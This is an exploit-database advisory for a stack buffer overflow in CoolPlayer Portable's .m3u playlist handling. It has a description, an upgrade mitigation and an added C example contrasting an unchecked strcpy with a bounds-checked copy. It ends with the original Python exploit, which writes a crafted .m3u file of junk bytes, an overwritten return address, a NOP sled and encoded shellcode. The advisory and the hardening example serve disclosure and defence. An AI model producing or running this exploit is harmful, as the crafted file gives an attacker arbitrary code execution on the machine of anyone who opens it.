Vendor: CoolPlayer Portable
By: Gold_m and stack
CVSS: 9.3 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: CoolPlayer Portable
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
Year: 2009

CoolPlayer Portable(m3u) Buffer Overflow exploit

CoolPlayer Portable is vulnerable to a stack-based buffer overflow when processing specially crafted .m3u files. The vulnerability is caused by a boundary error when copying data from the .m3u file into a fixed-length buffer: a .m3u file containing an overly long string overflows that buffer on the stack. Successful exploitation results in arbitrary code execution in the context of the user running the vulnerable application.

Mitigation:

Upgrade to the latest version of CoolPlayer Portable.
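
The boundary error described above, shown as an added C example next to a bounds-checked copy that rejects oversized playlist entries. This is not CoolPlayer's code and not part of the original advisory; ENTRY_MAX, the function names and the sample playlist are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed capacity of the fixed-length entry buffer; not from CoolPlayer's source. */
#define ENTRY_MAX 260

/* Unsafe pattern, shown for contrast and never called here: the copy length
 * comes from the file, so a long line writes past the end of dst. */
void copy_entry_unchecked(char *dst, const char *line) {
    strcpy(dst, line);
}

/* Hardened copy of one playlist line into dst (capacity cap, terminator included).
 * Returns 0 on success, -1 when the entry does not fit. An oversized entry is
 * rejected rather than truncated, so a clipped path is never opened. */
int copy_entry_checked(char *dst, size_t cap, const char *line) {
    size_t n = strcspn(line, "\r\n");      /* entry length without line ending */
    if (cap == 0) return -1;
    dst[0] = '\0';
    if (n >= cap) return -1;               /* no room for entry plus '\0' */
    memcpy(dst, line, n);
    dst[n] = '\0';
    return 0;
}

/* Walk an in-memory playlist and count the entries the checked copy rejects.
 * Lines starting with '#' are M3U comments/directives and are skipped. */
int count_rejected(const char *playlist) {
    char entry[ENTRY_MAX];
    int rejected = 0;
    for (const char *p = playlist; *p; ) {
        size_t n = strcspn(p, "\n");
        if (*p != '#' && copy_entry_checked(entry, sizeof entry, p) != 0)
            rejected++;
        p += n;
        if (*p == '\n') p++;
    }
    return rejected;
}

int main(void) {
    /* Constructed sample: one normal entry, then a 506-byte filler line. */
    char sample[1024] = "#EXTM3U\r\nC:\\Music\\track01.mp3\r\n";
    size_t off = strlen(sample);
    memset(sample + off, 'A', 506);
    sample[off + 506] = '\n';
    printf("rejected entries: %d\n", count_rejected(sample));
    return 0;
}
```

The check uses `n >= cap` rather than `n > cap` so that an entry of exactly ENTRY_MAX bytes is refused and the terminator always fits.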

Exploit-DB raw data:

#!/usr/bin/python
#[*] Usage   : coolplayer.py
#[*] Bug     : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on :    Xp sp2 (fr)
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com

#[*] Note: I didn't know why stack's exploit wouldn't work for me, but I found that the junk data wasn't right in my case.
#[*] And we have to expand the NOPs to pass the null byte.
#[*] It worked for me from the beginning.

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\xe4\x94\xba\x83\xeb\xfc\xe2\xf4\x85\x0c\xd0\xba\x79\xe4\x1f\xff"
"\x45\x6f\xe8\xbf\x01\xe5\x7b\x31\x36\xfc\x1f\xe5\x59\xe5\x7f\xf3"
"\xf2\xd0\x1f\xbb\x97\xd5\x54\x23\xd5\x60\x54\xce\x7e\x25\x5e\xb7"
"\x78\x26\x7f\x4e\x42\xb0\xb0\xbe\x0c\x01\x1f\xe5\x5d\xe5\x7f\xdc"
"\xf2\xe8\xdf\x31\x26\xf8\x95\x51\xf2\xf8\x1f\xbb\x92\x6d\xc8\x9e"
"\x7d\x27\xa5\x7a\x1d\x6f\xd4\x8a\xfc\x24\xec\xb6\xf2\xa4\x98\x31"
"\x09\xf8\x39\x31\x11\xec\x7f\xb3\xf2\x64\x24\xba\x79\xe4\x1f\xd2"
"\x45\xbb\xa5\x4c\x19\xb2\x1d\x42\xfa\x24\xef\xea\x11\x14\x1e\xbe"
"\x26\x8c\x0c\x44\xf3\xea\xc3\x45\x9e\x87\xf5\xd6\x1a\xe4\x94\xba")

exploit = "\x41"*220 + "\x5D\x38\x82\x7C" + "\x90"*122 + shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!\n"
except:
    print "Error"

# milw0rm.com [2009-04-22]